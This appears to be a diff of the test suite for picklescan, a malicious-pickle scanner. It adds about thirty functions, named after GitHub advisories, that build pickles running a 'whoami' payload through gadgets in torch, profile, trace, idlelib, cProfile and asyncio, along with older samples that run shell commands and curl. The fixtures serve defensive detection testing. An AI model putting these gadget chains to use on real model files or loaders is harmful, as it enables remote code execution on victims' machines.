@@ -1,5 +1,6 @@
 import aiohttp
 import bdb
+import cProfile
 import http.client
 import importlib
 import io
@@ -7,6 +8,18 @@ import os
 import pathlib
 import pickle
 import pip
+from code import InteractiveInterpreter
+from doctest import debug_script
+from functools import partial
+from idlelib.autocomplete import AutoComplete, ATTRS
+from idlelib.calltip import Calltip, get_entity
+from idlelib.debugobj import ObjectTreeItem
+from idlelib.pyshell import ModifiedInterpreter
+from idlelib.run import Executive
+from profile import Profile
+from trace import Trace
+from typing import Callable, Any, Union
+from unittest import TestCase
 import py7zr
 import pydoc
 import pytest
@@ -18,8 +31,6 @@ import sys
 import timeit
 import venv
 import zipfile
-from functools import partial
-from unittest import TestCase
 
 from picklescan.cli import main
 from picklescan.scanner import (
@@ -38,14 +49,6 @@ from picklescan.scanner import (
     scan_pytorch,
 )
 
-try:
-    import torch
-    import torch._inductor.codecache as codecache
-except ImportError:
-    # If PyTorch test files need to be regenerated, run 'pip install torch==2.6.0' first
-    torch = None
-    codecache = None
-
 _root_path = os.path.dirname(__file__)
 
 
@@ -64,9 +67,7 @@ class Malicious3:
         return http.client.HTTPSConnection, ("github.com",)
 
 
-malicious3_pickle_bytes = pickle.dumps(
-    Malicious3(), protocol=0
-)  # Malicious3 needs to be pickled before HTTPSConnection is mocked below
+malicious3_pickle_bytes = pickle.dumps(Malicious3(), protocol=0)  # Malicious3 needs to be pickled before HTTPSConnection is mocked below
 
 
 class Malicious4:
@@ -132,6 +133,8 @@ class Malicious16:
 
 class Malicious17:
     def __reduce__(self):
+        import torch._inductor.codecache as codecache
+
         return codecache.compile_file, ("", "", ["sh", "-c", '$(echo "pwned")'])
 
 
@@ -146,6 +149,8 @@ class Malicious19:
         self.kwargs = kwargs
 
     def __reduce__(self):
+        import torch
+
         return partial(torch.load, self.path, **self.kwargs), ()
 
 
@@ -169,6 +174,153 @@ class Malicious22:
         return runstring, ("import os; os.system('curl https://example.invalid')", {})
 
 
+_payload = "__import__('os').system('whoami')"
+
+
+def reduce_GHSA_4r9r_ch6f_vxmx():
+    import torch.utils.bottleneck.__main__ as bottleneck_main
+
+    return bottleneck_main.run_cprofile, (_payload, {})
+
+
+def reduce_GHSA_86cj_95qr_2p4f():
+    import torch._dynamo.guards as guards
+
+    return guards.GuardBuilder.get, ({}, _payload)
+
+
+def reduce_GHSA_f4x7_rfwp_v3xw():
+    import torch.fx.experimental.symbolic_shapes as symbolic_shapes
+
+    return symbolic_shapes.ShapeEnv.evaluate_guards_expression, ({}, _payload, [])
+
+
+def reduce_GHSA_f745_w6jp_hpxx():
+    import torch.utils.collect_env as collect_env
+
+    return collect_env.run, (_payload,)
+
+
+def reduce_GHSA_jhph_76pp_mggw():
+    import torch.utils.collect_env as collect_env
+
+    return collect_env.run_and_read_all, (collect_env.run, _payload)
+
+
+def reduce_GHSA_h3qp_7fh3_f8h4():
+    import torch.utils.data.datapipes.utils.decoder as decoder
+
+    return decoder.basichandlers, ("pickle", b"")
+
+
+def reduce_GHSA_vr7h_p6mm_wpmh():
+    import torch.jit.unsupported_tensor_ops as unsupported_tensor_ops
+
+    return unsupported_tensor_ops.execWrapper, (_payload, {}, {})
+
+
+def reduce_GHSA_vv6j_3g6g_2pvj():
+    from torch.utils._config_module import ConfigModule
+
+    return ConfigModule.load_config, ({}, b"")
+
+
+def reduce_GHSA_5qwp_399c_mjwf():
+    return Trace.run, ({}, _payload)
+
+
+def reduce_GHSA_g344_hcph_8vgg():
+    return Trace.runctx, ({}, _payload, {}, {})
+
+
+def reduce_GHSA_x696_vm39_cp64():
+    return Profile.run, ({}, _payload)
+
+
+def reduce_GHSA_6vqj_c2q5_j97w():
+    return Profile.runctx, ({}, _payload, {}, {})
+
+
+def reduce_GHSA_f54q_57x4_jg88():
+    from lib2to3.pgen2.grammar import Grammar
+
+    return Grammar.loads, ({}, b"")
+
+
+def reduce_GHSA_3vg9_h568_4w9m():
+    return ObjectTreeItem.SetText, ({}, _payload)
+
+
+def reduce_GHSA_6w4w_5w54_rjvr():
+    return AutoComplete.get_entity, ({}, _payload)
+
+
+def reduce_GHSA_7cq8_mj8x_j263():
+    return AutoComplete.fetch_completions, ({}, _payload, ATTRS)
+
+
+def reduce_GHSA_cj3c_v495_4xqh():
+    return InteractiveInterpreter.runcode, ({}, _payload)
+
+
+def reduce_GHSA_8r4j_24qv_fmq9():
+    return Calltip.fetch_tip, ({}, _payload)
+
+
+def reduce_GHSA_9xph_j2h6_g47v():
+    return get_entity, (_payload,)
+
+
+def reduce_GHSA_4whj_rm5r_c2v8():
+    import torch.utils.bottleneck.__main__ as bottleneck_main
+
+    return bottleneck_main.run_autograd_prof, (_payload, {})
+
+
+def reduce_GHSA_xp4f_hrf8_rxw7():
+    from ensurepip import _run_pip
+
+    return _run_pip, (_payload,)
+
+
+def reduce_GHSA_p9w7_82w4_7q8m():
+    from lib2to3.pgen2.pgen import ParserGenerator
+
+    return ParserGenerator.make_label, (None, {}, '""+' + _payload)
+
+
+def reduce_GHSA_m869_42cg_3xwr():
+    return Executive.runcode, ({}, _payload)
+
+
+def reduce_GHSA_j343_8v2j_ff7w():
+    return ModifiedInterpreter.runcommand, ({}, _payload)
+
+
+def reduce_GHSA_3gf5_cxq9_w223():
+    return ModifiedInterpreter.runcode, ({}, _payload)
+
+
+def reduce_GHSA_fqq6_7vqf_w3fg():
+    return debug_script, (_payload, True)
+
+
+def reduce_GHSA_9w88_8rmg_7g2p():
+    return cProfile.runctx, (_payload, None, None)
+
+
+def reduce_GHSA_49gj_c84q_6qm9():
+    return cProfile.run, (_payload,)
+
+
+def reduce_GHSA_q77w_mwjj_7mqx():
+    if sys.platform == "win32":
+        sys.platform = "mock"
+    from asyncio.unix_events import _UnixSubprocessTransport
+
+    return _UnixSubprocessTransport._start, ({}, "whoami", True, None, None, None, 0)
+
+
 class HTTPResponse:
     def __init__(self, status, data=None):
         self.status = status
@@ -205,17 +357,9 @@ class MockHTTPSConnection:
             with zipfile.ZipFile(buffer, "w") as zip:
                 zip.writestr("data.pkl", pickle.dumps(Malicious1()))
             self.response = HTTPResponse(200, buffer.getbuffer())
-        elif (
-            target
-            == "GET https://huggingface.co/api/models/ykilcher/totally-harmless-model"
-        ):
-            self.response = HTTPResponse(
-                200, b'{"siblings": [{"rfilename": "pytorch_model.bin"}]}'
-            )
-        elif (
-            target
-            == "GET https://huggingface.co/ykilcher/totally-harmless-model/resolve/main/pytorch_model.bin"
-        ):
+        elif target == "GET https://huggingface.co/api/models/ykilcher/totally-harmless-model":
+            self.response = HTTPResponse(200, b'{"siblings": [{"rfilename": "pytorch_model.bin"}]}')
+        elif target == "GET https://huggingface.co/ykilcher/totally-harmless-model/resolve/main/pytorch_model.bin":
             buffer = io.BytesIO()
             with zipfile.ZipFile(buffer, "w") as zip:
                 zip.writestr("archive/data.pkl", pickle.dumps(Malicious1()))
@@ -235,19 +379,32 @@ class MockHTTPSConnection:
 http.client.HTTPSConnection = MockHTTPSConnection
 
 
-def initialize_pickle_file(path, obj, version):
+def initialize_pickle_file(path: str, obj: Any, version: int):
     if not os.path.exists(path):
         with open(path, "wb") as file:
             pickle.dump(obj, file, protocol=version)
 
 
-def initialize_data_file(path, data):
+def initialize_pickle_file_from_reduce(filename: str, reduce: Callable[[], tuple], version: int = 4):
+    path = f"{_root_path}/data2/{filename}"
+    if os.path.exists(path):
+        return
+
+    class Reduce:
+        def __reduce__(self):
+            return reduce()
+
+    with open(path, "wb") as file:
+        pickle.dump(Reduce(), file, protocol=version)
+
+
+def initialize_data_file(path: str, data: bytes):
     if not os.path.exists(path):
         with open(path, "wb") as file:
             file.write(data)
 
 
-def initialize_7z_file(archive_path, file_name):
+def initialize_7z_file(archive_path: str, file_name: str):
     file_path = f"{_root_path}/data/malicious1.pkl"
     with open(file_path, "wb") as f:
         pickle.dump(Malicious1(), f, protocol=4)
@@ -259,13 +416,13 @@ def initialize_7z_file(archive_path, file_name):
     pathlib.Path.unlink(pathlib.Path(file_path))
 
 
-def initialize_zip_file(path, file_name, data):
+def initialize_zip_file(path: str, file_name: str, data: bytes):
     if not os.path.exists(path):
         with zipfile.ZipFile(path, "w") as zip:
             zip.writestr(file_name, data)
 
 
-def initialize_corrupt_zip_file_central_directory(path, file_name, data):
+def initialize_corrupt_zip_file_central_directory(path: str, file_name: str, data: bytes):
     if not os.path.exists(path):
         with zipfile.ZipFile(path, "w") as zip:
             zip.writestr(file_name, data)
@@ -281,6 +438,21 @@ def initialize_corrupt_zip_file_central_directory(path, file_name, data):
             f.write(modified_data)
 
 
+def initialize_corrupt_zip_file_crc(path: str, file_name: str, data: bytes):
+    if not os.path.exists(path):
+        with io.BytesIO() as buffer:
+            with zipfile.ZipFile(buffer, "w") as zip:
+                zip.writestr(file_name, data)
+            data = buffer.getbuffer().tobytes()
+
+        # Corrupt the data, leading to a CRC mismatch
+        modified_data = data.replace(b"print('456')", b"print('123')", 1)
+
+        # Write the corrupted content
+        with open(path, "wb") as f:
+            f.write(modified_data)
+
+
 def initialize_numpy_files():
     import numpy as np
 
@@ -308,9 +480,7 @@ def initialize_numpy_files():
 
     path = f"{_root_path}/data2/int_arrays.npz"
     if not os.path.exists(path):
-        np.savez(
-            path, a=np.array([0, 1, 2], dtype=int), b=np.array([3, 4, 5], dtype=int)
-        )
+        np.savez(path, a=np.array([0, 1, 2], dtype=int), b=np.array([3, 4, 5], dtype=int))
 
     path = f"{_root_path}/data2/object_arrays_compressed.npz"
     if not os.path.exists(path):
@@ -322,9 +492,7 @@ def initialize_numpy_files():
 
     path = f"{_root_path}/data2/int_arrays_compressed.npz"
     if not os.path.exists(path):
-        np.savez_compressed(
-            path, a=np.array([0, 1, 2], dtype=int), b=np.array([3, 4, 5], dtype=int)
-        )
+        np.savez_compressed(path, a=np.array([0, 1, 2], dtype=int), b=np.array([3, 4, 5], dtype=int))
 
     path = f"{_root_path}/data2/dns_exfiltration.npy"
     if not os.path.exists(path):
@@ -354,15 +522,9 @@ def initialize_pickle_files():
     # - Pickle versions 0, 1, 2 have built-in functions under '__builtin__' while versions 3 and 4 have them under 'builtins'
     # - Pickle versions 0, 1, 2, 3 use 'GLOBAL' opcode while 4 uses 'STACK_GLOBAL' opcode
     for version in (0, 3, 4):
-        initialize_pickle_file(
-            f"{_root_path}/data/benign0_v{version}.pkl", ["a", "b", "c"], version
-        )
-        initialize_pickle_file(
-            f"{_root_path}/data/malicious1_v{version}.pkl", Malicious1(), version
-        )
-        initialize_pickle_file(
-            f"{_root_path}/data/malicious2_v{version}.pkl", Malicious2(), version
-        )
+        initialize_pickle_file(f"{_root_path}/data/benign0_v{version}.pkl", ["a", "b", "c"], version)
+        initialize_pickle_file(f"{_root_path}/data/malicious1_v{version}.pkl", Malicious1(), version)
+        initialize_pickle_file(f"{_root_path}/data/malicious2_v{version}.pkl", Malicious2(), version)
 
     # Malicious Pickle from https://sensepost.com/cms/resources/conferences/2011/sour_pickles/BH_US_11_Slaviero_Sour_Pickles.pdf
     initialize_data_file(
@@ -505,15 +667,9 @@ def initialize_pickle_files():
     initialize_pickle_file(f"{_root_path}/data/malicious7.pkl", Malicious6(), 4)
     initialize_pickle_file(f"{_root_path}/data/malicious8.pkl", Malicious7(), 4)
     initialize_pickle_file(f"{_root_path}/data/malicious9.pkl", Malicious8(), 4)
-    initialize_pickle_file(
-        f"{_root_path}/data/malicious13a.pkl", Malicious13(), 0
-    )  # pickle module serialized as cpickle
-    initialize_pickle_file(
-        f"{_root_path}/data/malicious13b.pkl", Malicious13(), 4
-    )  # pickle module serialized as _pickle
-    initialize_pickle_file(
-        f"{_root_path}/data/malicious14.pkl", Malicious14(), 4
-    )  # runpy
+    initialize_pickle_file(f"{_root_path}/data/malicious13a.pkl", Malicious13(), 0)  # pickle module serialized as cpickle
+    initialize_pickle_file(f"{_root_path}/data/malicious13b.pkl", Malicious13(), 4)  # pickle module serialized as _pickle
+    initialize_pickle_file(f"{_root_path}/data/malicious14.pkl", Malicious14(), 4)  # runpy
     initialize_pickle_file(f"{_root_path}/data/malicious15a.pkl", Malicious15(), 2)
     initialize_pickle_file(f"{_root_path}/data/malicious15b.pkl", Malicious15(), 4)
     initialize_pickle_file(f"{_root_path}/data/malicious16.pkl", Malicious16(), 0)
@@ -524,9 +680,7 @@ def initialize_pickle_files():
     # This exploit serializes kwargs and passes them into a torch.load call
     initialize_pickle_file(
         f"{_root_path}/data/malicious19.pkl",
-        Malicious19(
-            "some_other_model.bin", pickle_file="config.json", weights_only=False
-        ),
+        Malicious19("some_other_model.bin", pickle_file="config.json", weights_only=False),
         4,
     )
 
@@ -548,6 +702,12 @@ def initialize_pickle_files():
         pickle.dumps(Malicious1(), protocol=4),
     )
 
+    initialize_corrupt_zip_file_crc(
+        f"{_root_path}/data2/malicious1_crc.zip",
+        "data.pkl",
+        pickle.dumps(Malicious1(), protocol=4),
+    )
+
     initialize_zip_file(
         f"{_root_path}/data/malicious1_wrong_ext.zip",
         "data.txt",  # Pickle file with a non-standard extension
@@ -576,11 +736,59 @@ def initialize_pickle_files():
         ),
     )
 
+    initialize_pickle_file_from_reduce("GHSA-4r9r-ch6f-vxmx.pkl", reduce_GHSA_4r9r_ch6f_vxmx)
+    initialize_pickle_file_from_reduce("GHSA-86cj-95qr-2p4f.pkl", reduce_GHSA_86cj_95qr_2p4f)
+    initialize_pickle_file_from_reduce("GHSA-f4x7-rfwp-v3xw.pkl", reduce_GHSA_f4x7_rfwp_v3xw)
+    initialize_pickle_file_from_reduce("GHSA-f745-w6jp-hpxx.pkl", reduce_GHSA_f745_w6jp_hpxx)
+    initialize_pickle_file_from_reduce("GHSA-jhph-76pp-mggw.pkl", reduce_GHSA_jhph_76pp_mggw)
+    initialize_pickle_file_from_reduce("GHSA-h3qp-7fh3-f8h4.pkl", reduce_GHSA_h3qp_7fh3_f8h4)
+    initialize_pickle_file_from_reduce("GHSA-vr7h-p6mm-wpmh.pkl", reduce_GHSA_vr7h_p6mm_wpmh)
+    initialize_pickle_file_from_reduce("GHSA-vv6j-3g6g-2pvj.pkl", reduce_GHSA_vv6j_3g6g_2pvj)
+    initialize_pickle_file_from_reduce("GHSA-5qwp-399c-mjwf.pkl", reduce_GHSA_5qwp_399c_mjwf)
+    initialize_pickle_file_from_reduce("GHSA-g344-hcph-8vgg.pkl", reduce_GHSA_g344_hcph_8vgg)
+    initialize_pickle_file_from_reduce("GHSA-x696-vm39-cp64.pkl", reduce_GHSA_x696_vm39_cp64)
+    initialize_pickle_file_from_reduce("GHSA-6vqj-c2q5-j97w.pkl", reduce_GHSA_6vqj_c2q5_j97w)
+    initialize_pickle_file_from_reduce("GHSA-f54q-57x4-jg88.pkl", reduce_GHSA_f54q_57x4_jg88)
+    initialize_pickle_file_from_reduce("GHSA-3vg9-h568-4w9m.pkl", reduce_GHSA_3vg9_h568_4w9m)
+    initialize_pickle_file_from_reduce("GHSA-6w4w-5w54-rjvr.pkl", reduce_GHSA_6w4w_5w54_rjvr)
+    initialize_pickle_file_from_reduce("GHSA-7cq8-mj8x-j263.pkl", reduce_GHSA_7cq8_mj8x_j263)
+    initialize_pickle_file_from_reduce("GHSA-cj3c-v495-4xqh.pkl", reduce_GHSA_cj3c_v495_4xqh)
+    initialize_pickle_file_from_reduce("GHSA-8r4j-24qv-fmq9.pkl", reduce_GHSA_8r4j_24qv_fmq9)
+    initialize_pickle_file_from_reduce("GHSA-9xph-j2h6-g47v.pkl", reduce_GHSA_9xph_j2h6_g47v)
+    initialize_pickle_file_from_reduce("GHSA-4whj-rm5r-c2v8.pkl", reduce_GHSA_4whj_rm5r_c2v8)
+    initialize_pickle_file_from_reduce("GHSA-xp4f-hrf8-rxw7.pkl", reduce_GHSA_xp4f_hrf8_rxw7)
+    initialize_pickle_file_from_reduce("GHSA-p9w7-82w4-7q8m.pkl", reduce_GHSA_p9w7_82w4_7q8m)
+    initialize_pickle_file_from_reduce("GHSA-m869-42cg-3xwr.pkl", reduce_GHSA_m869_42cg_3xwr)
+    initialize_pickle_file_from_reduce("GHSA-j343-8v2j-ff7w.pkl", reduce_GHSA_j343_8v2j_ff7w)
+    initialize_pickle_file_from_reduce("GHSA-3gf5-cxq9-w223.pkl", reduce_GHSA_3gf5_cxq9_w223)
+    initialize_pickle_file_from_reduce("GHSA-fqq6-7vqf-w3fg.pkl", reduce_GHSA_fqq6_7vqf_w3fg)
+    initialize_pickle_file_from_reduce("GHSA-9w88-8rmg-7g2p.pkl", reduce_GHSA_9w88_8rmg_7g2p)
+    initialize_pickle_file_from_reduce("GHSA-49gj-c84q-6qm9.pkl", reduce_GHSA_49gj_c84q_6qm9)
+    initialize_pickle_file_from_reduce("GHSA-q77w-mwjj-7mqx.pkl", reduce_GHSA_q77w_mwjj_7mqx)
+    initialize_pickle_file_from_reduce("GHSA-jgw4-cr84-mqxg.bin", reduce_GHSA_q77w_mwjj_7mqx)
+
 
 initialize_pickle_files()
 initialize_numpy_files()
 
 
+def assert_scan(
+    filename: str,
+    globals: list[Global],
+    issues_count: Union[int, None] = None,
+    infected_files: int = 1,
+):
+    compare_scan_results(
+        scan_file_path(f"{_root_path}/data2/{filename}"),
+        ScanResult(
+            globals=globals,
+            scanned_files=1,
+            issues_count=issues_count if issues_count is not None else sum(g.safety == SafetyLevel.Dangerous for g in globals),
+            infected_files=infected_files,
+        ),
+    )
+
+
 def compare_scan_results(sr1: ScanResult, sr2: ScanResult):
     test_case = TestCase()
     assert sr1.scanned_files == sr2.scanned_files
@@ -597,15 +805,13 @@ def test_http_get():
 
 
 def test_list_globals():
-    assert _list_globals(io.BytesIO(pickle.dumps(Malicious1()))) == {
-        ("builtins", "eval")
-    }
+    assert _list_globals(io.BytesIO(pickle.dumps(Malicious1()))) == {("builtins", "eval")}
 
 
 def test_scan_pickle_bytes():
-    assert scan_pickle_bytes(
-        io.BytesIO(pickle.dumps(Malicious1())), "file.pkl"
-    ) == ScanResult([Global("builtins", "eval", SafetyLevel.Dangerous)], 1, 1, 1)
+    assert scan_pickle_bytes(io.BytesIO(pickle.dumps(Malicious1())), "file.pkl") == ScanResult(
+        [Global("builtins", "eval", SafetyLevel.Dangerous)], 1, 1, 1
+    )
 
 
 def test_scan_zip_bytes():
@@ -624,9 +830,7 @@ def test_scan_numpy():
             scan_numpy(io.BytesIO(f.read()), "object_array.npy"),
             ScanResult(
                 [
-                    Global(
-                        "numpy.core.multiarray", "_reconstruct", SafetyLevel.Innocuous
-                    ),
+                    Global("numpy.core.multiarray", "_reconstruct", SafetyLevel.Innocuous),
                     Global("numpy", "ndarray", SafetyLevel.Innocuous),
                     Global("numpy", "dtype", SafetyLevel.Innocuous),
                 ],
@@ -675,13 +879,9 @@ def test_scan_pytorch():
         0,
     )
     with open(f"{_root_path}/data/pytorch_model.bin", "rb") as f:
-        compare_scan_results(
-            scan_pytorch(io.BytesIO(f.read()), "pytorch_model.bin"), scan_result
-        )
+        compare_scan_results(scan_pytorch(io.BytesIO(f.read()), "pytorch_model.bin"), scan_result)
     with open(f"{_root_path}/data/new_pytorch_model.bin", "rb") as f:
-        compare_scan_results(
-            scan_pytorch(io.BytesIO(f.read()), "pytorch_model.bin"), scan_result
-        )
+        compare_scan_results(scan_pytorch(io.BytesIO(f.read()), "pytorch_model.bin"), scan_result)
 
 
 def test_scan_file_path():
@@ -698,9 +898,7 @@ def test_scan_file_path():
         0,
         0,
     )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/pytorch_model.bin"), pytorch
-    )
+    compare_scan_results(scan_file_path(f"{_root_path}/data/pytorch_model.bin"), pytorch)
 
     malicious0 = ScanResult(
         [
@@ -715,123 +913,59 @@ def test_scan_file_path():
         4,
         1,
     )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious0.pkl"), malicious0
-    )
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious0.pkl"), malicious0)
 
-    malicious1_v0 = ScanResult(
-        [Global("__builtin__", "eval", SafetyLevel.Dangerous)], 1, 1, 1
-    )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious1_v0.pkl"), malicious1_v0
-    )
+    malicious1_v0 = ScanResult([Global("__builtin__", "eval", SafetyLevel.Dangerous)], 1, 1, 1)
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious1_v0.pkl"), malicious1_v0)
 
-    malicious1 = ScanResult(
-        [Global("builtins", "eval", SafetyLevel.Dangerous)], 1, 1, 1
-    )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious1_v3.pkl"), malicious1
-    )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious1_v4.pkl"), malicious1
-    )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious1.zip"), malicious1
-    )
+    malicious1 = ScanResult([Global("builtins", "eval", SafetyLevel.Dangerous)], 1, 1, 1)
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious1_v3.pkl"), malicious1)
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious1_v4.pkl"), malicious1)
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious1.zip"), malicious1)
     compare_scan_results(
         scan_file_path(f"{_root_path}/data/malicious1_central_directory.zip"),
         malicious1,
     )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious1_0x1.zip"), malicious1
-    )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious1_0x20.zip"), malicious1
-    )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious1_0x40.zip"), malicious1
-    )
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious1_0x1.zip"), malicious1)
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious1_0x20.zip"), malicious1)
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious1_0x40.zip"), malicious1)
     compare_scan_results(scan_file_path(f"{_root_path}/data/malicious1.7z"), malicious1)
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious1_wrong_ext.zip"), malicious1
-    )
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious1_wrong_ext.zip"), malicious1)
 
     malicious2 = ScanResult([Global("posix", "system", SafetyLevel.Dangerous)], 1, 1, 1)
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious2_v0.pkl"), malicious2
-    )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious2_v3.pkl"), malicious2
-    )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious2_v4.pkl"), malicious2
-    )
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious2_v0.pkl"), malicious2)
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious2_v3.pkl"), malicious2)
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious2_v4.pkl"), malicious2)
 
-    malicious3 = ScanResult(
-        [Global("httplib", "HTTPSConnection", SafetyLevel.Dangerous)], 1, 1, 1
-    )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious3.pkl"), malicious3
-    )
+    malicious3 = ScanResult([Global("httplib", "HTTPSConnection", SafetyLevel.Dangerous)], 1, 1, 1)
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious3.pkl"), malicious3)
 
-    malicious4 = ScanResult(
-        [Global("requests.api", "get", SafetyLevel.Dangerous)], 1, 1, 1
-    )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious4.pickle"), malicious4
-    )
+    malicious4 = ScanResult([Global("requests.api", "get", SafetyLevel.Dangerous)], 1, 1, 1)
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious4.pickle"), malicious4)
 
-    malicious5 = ScanResult(
-        [Global("aiohttp.client", "ClientSession", SafetyLevel.Dangerous)], 1, 1, 1
-    )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious5.pickle"), malicious5
-    )
+    malicious5 = ScanResult([Global("aiohttp.client", "ClientSession", SafetyLevel.Dangerous)], 1, 1, 1)
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious5.pickle"), malicious5)
 
-    malicious6 = ScanResult(
-        [Global("requests.api", "get", SafetyLevel.Dangerous)], 1, 1, 1
-    )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious6.pkl"), malicious6
-    )
+    malicious6 = ScanResult([Global("requests.api", "get", SafetyLevel.Dangerous)], 1, 1, 1)
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious6.pkl"), malicious6)
 
-    malicious7 = ScanResult(
-        [Global("socket", "create_connection", SafetyLevel.Dangerous)], 1, 1, 1
-    )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious7.pkl"), malicious7
-    )
+    malicious7 = ScanResult([Global("socket", "create_connection", SafetyLevel.Dangerous)], 1, 1, 1)
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious7.pkl"), malicious7)
 
-    malicious8 = ScanResult(
-        [Global("subprocess", "run", SafetyLevel.Dangerous)], 1, 1, 1
-    )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious8.pkl"), malicious8
-    )
+    malicious8 = ScanResult([Global("subprocess", "run", SafetyLevel.Dangerous)], 1, 1, 1)
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious8.pkl"), malicious8)
 
     malicious9 = ScanResult([Global("sys", "exit", SafetyLevel.Dangerous)], 1, 1, 1)
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious9.pkl"), malicious9
-    )
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious9.pkl"), malicious9)
 
-    malicious10 = ScanResult(
-        [Global("__builtin__", "exec", SafetyLevel.Dangerous)], 1, 1, 1
-    )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious10.pkl"), malicious10
-    )
+    malicious10 = ScanResult([Global("__builtin__", "exec", SafetyLevel.Dangerous)], 1, 1, 1)
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious10.pkl"), malicious10)
 
     bad_pytorch = ScanResult([], 0, 0, 0, True)
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/bad_pytorch.pt"), bad_pytorch
-    )
+    compare_scan_results(scan_file_path(f"{_root_path}/data/bad_pytorch.pt"), bad_pytorch)
 
-    malicious14 = ScanResult(
-        [Global("runpy", "_run_code", SafetyLevel.Dangerous)], 1, 1, 1
-    )
-    compare_scan_results(
-        scan_file_path(f"{_root_path}/data/malicious14.pkl"), malicious14
-    )
+    malicious14 = ScanResult([Global("runpy", "_run_code", SafetyLevel.Dangerous)], 1, 1, 1)
+    compare_scan_results(scan_file_path(f"{_root_path}/data/malicious14.pkl"), malicious14)
 
     compare_scan_results(
         scan_file_path(f"{_root_path}/data2/malicious21.pkl"),
@@ -849,9 +983,7 @@ def test_scan_file_path():
         scan_file_path(f"{_root_path}/data2/malicious22.pkl"),
         ScanResult(
             [
-                Global(
-                    "numpy.testing._private.utils", "runstring", SafetyLevel.Dangerous
-                ),
+                Global("numpy.testing._private.utils", "runstring", SafetyLevel.Dangerous),
             ],
             scanned_files=1,
             issues_count=1,
@@ -871,6 +1003,50 @@ def test_scan_file_path():
         ),
     )
 
+    assert_scan(
+        "GHSA-4r9r-ch6f-vxmx.pkl",
+        [Global("torch.utils.bottleneck.__main__", "run_cprofile", SafetyLevel.Dangerous)],
+    )
+    assert_scan("GHSA-86cj-95qr-2p4f.pkl", [Global("torch._dynamo.guards", "GuardBuilder.get", SafetyLevel.Dangerous)])
+    assert_scan(
+        "GHSA-f4x7-rfwp-v3xw.pkl",
+        [Global("torch.fx.experimental.symbolic_shapes", "ShapeEnv.evaluate_guards_expression", SafetyLevel.Dangerous)],
+    )
+    assert_scan("GHSA-f745-w6jp-hpxx.pkl", [Global("torch.utils.collect_env", "run", SafetyLevel.Dangerous)])
+    assert_scan(
+        "GHSA-jhph-76pp-mggw.pkl",
+        [
+            Global("torch.utils.collect_env", "run", SafetyLevel.Dangerous),
+            Global("torch.utils.collect_env", "run_and_read_all", SafetyLevel.Suspicious),
+        ],
+    )
+    assert_scan("GHSA-h3qp-7fh3-f8h4.pkl", [Global("torch.utils.data.datapipes.utils.decoder", "basichandlers", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-vr7h-p6mm-wpmh.pkl", [Global("torch.jit.unsupported_tensor_ops", "execWrapper", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-vv6j-3g6g-2pvj.pkl", [Global("torch.utils._config_module", "ConfigModule.load_config", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-5qwp-399c-mjwf.pkl", [Global("trace", "Trace.run", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-g344-hcph-8vgg.pkl", [Global("trace", "Trace.runctx", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-x696-vm39-cp64.pkl", [Global("profile", "Profile.run", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-6vqj-c2q5-j97w.pkl", [Global("profile", "Profile.runctx", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-f54q-57x4-jg88.pkl", [Global("lib2to3.pgen2.grammar", "Grammar.loads", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-3vg9-h568-4w9m.pkl", [Global("idlelib.debugobj", "ObjectTreeItem.SetText", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-6w4w-5w54-rjvr.pkl", [Global("idlelib.autocomplete", "AutoComplete.get_entity", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-7cq8-mj8x-j263.pkl", [Global("idlelib.autocomplete", "AutoComplete.fetch_completions", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-cj3c-v495-4xqh.pkl", [Global("code", "InteractiveInterpreter.runcode", SafetyLevel.Dangerous)])
